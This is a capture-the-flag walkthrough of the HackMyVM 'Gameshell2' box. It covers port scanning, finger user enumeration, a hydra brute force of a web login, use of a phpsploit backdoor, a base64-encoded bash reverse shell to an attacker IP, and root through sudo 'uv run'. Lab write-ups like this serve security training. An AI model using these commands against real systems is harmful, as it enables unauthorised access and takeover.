Box Info
  • Name:Gameshell2
  • OS: Linux
  • Difficulty: Easy
  • IP: 10.0.0.27
Gameshell2 box logo

Setup

mkdir -p ~/ctf/HackMyVM/Gameshell2/scans && cd ~/ctf/HackMyVM/Gameshell2

IP Address: 10.0.0.27

Add to /etc/hosts (requires sudo): echo "10.0.0.27 gameshell2.hmv" | sudo tee -a /etc/hosts

10.0.0.27 gameshell2.hmv

Enumeration

Nmap (full TCP, safe defaults): nmap -sC -sV -Pn -p- gameshell2.hmv -oN ~/ctf/HackMyVM/Gameshell2/scans/nmap_20260109-210416.txt -vv

Fast sweep variant: nmap -sC -sV -p- -T4 --min-rate 2000 -vv gameshell2.hmv -oN ~/ctf/HackMyVM/Gameshell2/scans/nmap_fast_20260109-210416.txt

# nmap findings
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
79/tcp open  finger  syn-ack ttl 64 OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at GameShell2 !\x0D
| 
|  11:27:38 up 18 min,  0 users,  load average: 1.35, 4.33, 2.64
| \x0D
|_No one logged on.\x0D
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/ternimal/
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
MAC Address: 08:00:27:48:E7:B8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

We see the 79/tcp for finger protocol and 80/tcp - http, when we open the HTTP port we see a billiards game.

We use fuzzing to determine, the directories which might be exposed on this web server.

Gobuster (common web dirs): gobuster dir --no-error -e -x php,html,txt -u http://gameshell2.hmv -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -o ~/ctf/HackMyVM/Gameshell2/scans/gobuster_20260109-210416.txt

Gobuster Cheatsheet

# gobuster findings

===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://gameshell2.hmv
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php,html,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html                     (Status: 200) [Size: 14134]
/users.html                    (Status: 200) [Size: 2052]
/robots.txt                     (Status: 200) [Size: 35]
/terminal                      (Status: 401) [Size: 461]
/server-status                  (Status: 403) [Size: 279]
Progress: 882228 / 882228 (100.00%)
===============================================================
Finished
===============================================================

FFUF directory search: ffuf -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:ff -u http://gameshell2.hmv/ff -o ~/ctf/HackMyVM/Gameshell2/scans/ffuf_dir_20260109-210416.json

# FFUF dir search findings

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://gameshell2.hmv/ff
 :: Wordlist         : ff: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Follow redirects : true
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
terminal                [Status: 401, Size: 461, Words: 42, Lines: 15, Duration: 1ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]

We see robots.txt and users.html, when we open

using Finger-User-Enumeration and metasploit module auxiliary/scanner/finger/finger_users, this was a premade scripts based bruteforce attack to determine all the valid users.

But that did not work due to some odd reason, so i had to make a custom bash script to take each line and run it through the finger command and output only results which didn’t have “no such user or unknown user or connect: Connection refused” in them

#!/bin/bash

HOST="10.0.0.27"

while IFS= read -r user; do
    output=$(finger "$user@$HOST" 2>&1)

    # Filter out invalid users
    if ! echo "$output" | grep -qiE "no such user|unknown user|connect: Connection refused"; then
        echo "----- $user -----"
        echo "$output"
        echo
    fi
done < users.txt

from this we know we have lp, dt and root (from manual testing) users in the machine. lp user seems to be linux-system account for spooler service.

Lets try the /terminal directory login using dt user and rockyou.txt, we can utilise hydra for this.

hydra -l dt -P /usr/share/wordlists/rockyou.txt http-get://10.0.0.27/terminal

We have a valid credential dt:purple1

when logging in to the gameshell2.hvm/terminal, we find a shell based snake game. The objective is to get a score of 15. ( took a lot of concentration T _ T ).

after scoring 15, we get a password: 0t4tdtlt, lets try a ssh as dt user with this password:

  • I might come back and update this writeup to take a look at this game to break it in another way.

User Flag

Location: /home/dt/user.txt

Privilege Escalation

Enumerating the file system as user dt, I checked /etc/hosts and discovered an internal domain: 127.0.1.1 dev.astra.dsz. To interact with this, I added dev.astra.dsz to my attacker machine’s /etc/hosts file pointing to the box IP:

gobuster dir --no-error -e -x php,html,txt -u http://dev.astra.dsz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 using this fuzzing we find the following endpoints the interesting one is backdoor.php, I try the usual id cmd endpoints in many ways.

Inside dt’s home directory, I found a folder named phpsploit. This is a specific C2 framework. Finding this tool here strongly suggests that backdoor.php (found via Gobuster) is a backdoor generated by this specific framework. This gives us the exact tool needed to interact with it.

lets try running this

It requires us to install python requirements

So, setting the target as http://dev.astra.dsz/backdoor.php, we get a reverse shell as www-data. We also come to know the phpsploit uses HTTP_PHPSPL01T header to execute this.

using echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xOC82NjY2IDA+JjE=" | base64 -d | bash, we send our payload and obtain a reverse shell

The user www-data is allowed to run the /usr/bin/uv binary as root without a password. Checking the help page for uv confirms it has a run command which can execute arbitrary scripts or binaries.

using sudo uv run '/bin/bash' we get a root shell and we are in!

Root Flag

Location: /root